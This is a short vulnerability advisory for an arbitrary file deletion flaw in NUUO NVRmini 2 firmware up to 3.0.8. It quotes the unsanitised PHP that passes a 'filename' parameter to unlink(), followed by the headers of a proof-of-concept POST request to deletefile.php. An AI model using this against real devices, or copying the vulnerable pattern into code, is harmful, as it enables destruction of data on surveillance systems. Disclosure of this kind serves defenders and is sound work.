NUUO 3.0.8 Arbitrary File Deletion

Type packetstorm
Reporter LiquidWorm
Modified 2016-08-06T00:00:00


NUUO Arbitrary File Deletion Vulnerability  
Vendor: NUUO Inc.  
Product web page:  
Affected version: <=3.0.8  
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS  
functionality. Setup is simple and easy, with automatic port forwarding  
settings built in. NVRmini 2 supports POS integration, making this the perfect  
solution for small retail chain stores. NVRmini 2 also comes full equipped as  
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping  
and RAID functions for data protection. Choose NVR and know that your valuable video  
data is safe, always.  
Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly  
sanitised before being used to delete files. This can be exploited to delete files  
with the permissions of the web server using their absolute path or via directory  
traversal sequences passed within the affected POST/GET parameter.  
1: <?php  
2: $filename=$_POST['filename'];  
3: unlink($filename);  
4: if (file_exists($filename))  
5: echo "fail";  
6: else echo "true";  
7: ?>  
Tested on: GNU/Linux 3.0.8 (armv7l)  
GNU/Linux (armv5tel)  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2016-5353  
Advisory URL:  
POST /deletefile.php HTTP/1.1  
Content-Length: x  
X-Requested-With: XMLHttpRequest  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept: */*  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Connection: close